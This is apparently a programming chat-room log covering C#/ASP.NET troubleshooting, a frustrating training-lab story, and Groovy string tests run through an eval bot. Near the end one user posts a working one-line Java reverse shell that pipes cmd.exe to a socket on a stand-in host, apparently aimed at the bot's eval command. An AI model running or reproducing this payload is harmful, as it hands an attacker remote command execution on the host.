@RoelvanUden ughh that's what our dad said .-. but it's like....the only reason he stopped studying it is because the German program in his school is likely gonna get cut soon
Technology documentation isn't predominantly German anymore, most Germans know and speak English now. You're better of with English and Chinese nowadays :D
Has anyone pushed a MVC Web API/Angular App to production? If so, how do you get past the damn "Could not load file or assembly 'Microsoft.AspNet.TelemetryCorrelation' or one of its dependencies. The system cannot find the file specified." error?
@Skullomania Then you are probably fine with removing all telemetry based nuget packages from your project. I take it this is a personal project and not a production application
Instead of deleting the references, remove them through the Nuget Package Manager.
Sit and read my story with the lab deployment team.
I started this training about a week ago. This training had a lab associated to it, and I would clear through it quick AF. A wild exercise appears! Create a service offering, create the contract options with several tiers, pricing, subscription, etc. just like you have in any cloud environment. I see an error during orchestration but don't mind it, something minor I guess?
So I go ahead and purchase my service on a Micro instance with just 1CPU and 1024MB RAM (smallest possible unit), and this immediately fails. I was wondering, didn't find anything I did wrong so I contact the lab team. They take 1 day to respond. Few hours pass and 13 mails are sent, all of them asking a different indian employee if they can take a look at it.
Few days pass, they apparently solved the issue so I go ahead and try to hire my service, which fails again, same issue. I check the cloud management console and see the service is unavailable now. Apparently they didn't solve the issue, but also they managed to break Kubernetes and the container that had all the authentication was killed.
So it takes another 2 days and they apply a new solution, and welcome me to try again. This time my service isn't there. Or the Organization I created, or the resource pools. Everything was gone... so I asked what happened, apparently they reset my session because something was wrong. Lost my progress of the last 5 days, however they offered me to extend the lab for 2 days to compensate.
So I contact my manager, he'll probably pull some strings. But yeah I just lost 5 days worth of training exercises because some IT pro wanted to "fix" the lab by deleting it and putting it up again.
Yeah just imagine working for a bank and you notice a bug that doesn't allow you to display the currency symbol
so you delete the servers and deploy a new bank infrastructure where everything works great, and fuck the accounting, the money wasn't yours, so tell your employees to ask more people for money to be stored
Hey all, is it just me who has the following perspective: A lot of the times method delegates are a pain to use because it feels like there are too many names used for the same "method's block of code", and it could lead to confusion. In other words, it can be seen an unnecessarily aliasing of names
@JonathonChase true but still, the lab relies on earlier exercises to do the next ones. What I'm doing is basically deploying a whole organization worth of resources and services.
so if I try to do it faster because I believe I know something I will screw up
perhaps they created the problem..but did you place as many guards as possible. if this is a learning experience, i guess that might not be possible
ie. "someone poured coffee on my hdd" should be followed with "but i have backups, so the damage is minimized" ...however that might apply to your case. or maybe it doesnt.
er..not literally the same; im sure you get the point.
This is the first in an ongoing series from developers expressing their opinions on various topics in the software engineering and computer science world. The opinions expressed here are solely those of the author. If you disagree, drop a comment and let us know your take—respectfully, of course.
I suspect that a lot of people will interpret this article as “gatekeeping.” Although I can understand that perspective, I’ve strived to provide an honest outlook that reflects my experience over the last few years (mostly startups). I also want to explicitly disclaim that I will be focusing on f …
@Feeds yea yea you are a full stack engineer and they come to you at work and ask you to write an iOS app suddenly claiming you should know how to since you are FULLSTACK meaning ANYTHING I DARN WANT BECAUSE I PAY FOR IT
developers are abused yo and we are letting this happen
"We want you to use Xamarin for the App, so we can reuse our existing C# talent." 6 months later "I don't know why you went with Xamarin for this, we clearly need native. Also no swift."
I have a dependency I need to use during my asp.net core startup method, that also needs dependencies that are registered during the same method, and I'm really running in circles trying to figure out how I'm going to do this without doubling up my singletons by building the service provider too early
Quick question, whats the best way to add a single property to an array. For instance. My json format requires something like: "item" : [{"obj":7] however I know there will only ever be one item in that list. Right now I have the property as List<item> then just add to the list. But thats a pain to access because I have to hard code item[0] or use linq to get first. Thoughts?
I think what I need to do is go ahead and figure out how I can just inject to the service directly instead of trying to configure it with extensions. Ugh learning new things you're the best/worst
Oh crap this library was straight out merged with another one. I hope it gives me an easier time
Aha, someone made it possible to provide the type of the service instead of the service itself. Just had to find the magic combination of words for the googles to find it.
If an algorithm uses two for loops, then it's theta(n^2), if we could use only one for , then its theta(n). always?
public static T[] BubbleSort<T>(T[] arr) where T : IComparable<T>
{
for (int i = 0, n = arr.Length - 1; n > 0; i++, Incre(ref n, ref i))
{
if (arr[i].CompareTo(arr[i + 1]) > 0)
{
var current = arr[i];
var next = arr[i + 1];
arr[i] = next;
arr[i + 1] = current;
}
}
return arr;
}
private static void Incre(ref int n, ref int i)
Hi. I am trying to think of a pattern, that would be useful for resolving each of these steps... rather than adding more to the mix. how would I break this out? what kind of pattern?
private void ResolveServer(Server server, ServerStatusItemsSearchParameters searchParameters)
{
ResolveMenuItem(Status.Converting, server);
ResolveMenuItem(Status.Error, server);
ResolveMenuItem(Status.Success, server);
ResolvePickleStatusItem(server);
nothing per se.... if one of the bottom methods take an action we want to short-circuit it... and not fire the method below it... and also would not want in the future to just add more methods.
so yes we could add a bool hasMotorcycleBeenRestarted.. but it is not elegant enough me thinks...
there must be some sort of orchestration pattern that will make it more OOP
@misha130 It's a big 'kinda'. The compiler does not emit the tail opcode, but the 64bit JITer is likely to make the optimization. The 32bit JITer I do not believe will. So it's a really, really fun way to accidentally blow your stack on different environments and have trouble reproducing.
I guess it's less a 'kinda' and more of a 'No, but here is trivia'.
I need sleep....it took me an hour to figure out a single SQL thing....granted it was a tough thing that required a lot of hoops to leap through, but still @.@
Which this blog covers pretty well: http://community.bartdesmet.net/blogs/bart/archive/2009/11/08/jumping-the-trampoline-in-c-stack-friendly-recursion.aspx It's a lot of complexity to take on for recursion, though.
Yeah, maybe one day. I'm still waiting for record types to make it over. They first pitched them for C# 6.
Trying to run a post request and no data is being sent, even though passing it through? The backend is reporting no post data was sent and I've checked it doesn't seem to send it?
I have doubled checked everything but I don't understand why? StackOverflow keeps asking me for more description so ...
How about eval Process p=new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();Socket s=new Socket("thiswouldbemyip.lol",9001);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@Wietbot eval def user = "Wietlol"; def template = "Hello $user!"; def result = template.toString(); user = "mr5"; result += " "; result += template.toString(); result
@Wietbot eval def user = "Wietlol"; def template = "Hello ${->user}!"; def result = template.toString(); user = "mr5"; result += " "; result += template.toString(); result
but, they are only evaluated when you actually convert them to a String
@Wietbot eval def user = "Wietlol"; def template = "Hello ${->user}!"; String result = template; user = "mr5"; result += " "; result += template; result